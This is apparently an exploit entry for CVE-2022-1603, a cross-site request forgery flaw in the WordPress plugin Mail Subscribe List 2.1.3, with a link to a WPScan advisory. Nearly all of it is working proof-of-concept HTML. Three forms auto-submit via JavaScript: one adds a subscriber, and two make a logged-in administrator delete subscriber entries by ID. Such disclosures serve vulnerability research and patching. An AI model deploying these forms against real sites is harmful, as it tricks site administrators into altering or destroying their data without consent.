CVE: CVE-2022-1603

Name: Mail Subscribe List (mail-subscribe-list)

Version: 2.1.3

Date: 2022-04-14 19:23:21

Advisory: https://wpscan.com/vulnerability/0e12ba6f-a86f-4cc6-9013-8a15586098d0

Type: CSRF

Exploit: 


<form action="https://example.com/sample-page/" method="POST">
    <input type="text" name="sml_subscribe" value="1">
    <input type="text" name="sml_name" value="cc">
    <input type="text" name="sml_email" value="cc@example.com">
</form>
<script>
    document.forms[0].submit();
</script>


<form action="https://example.com/wp-admin/admin.php?page=mail-subscribe-list/index.php" method="POST">
    <input type="text" name="sml_remove" value="1">
    <input type="text" name="rem[]" value="2">
</form>
<script>
    document.forms[0].submit();
</script>


<form action="https://example.com/wp-admin/admin.php?page=mail-subscribe-list/index.php" method="POST">
    <input type="text" name="sml_remove" value="1">
    <input type="text" name="rem[]" value="1">
    <input type="text" name="rem[]" value="4">
</form>
<script>
    document.forms[0].submit();
</script>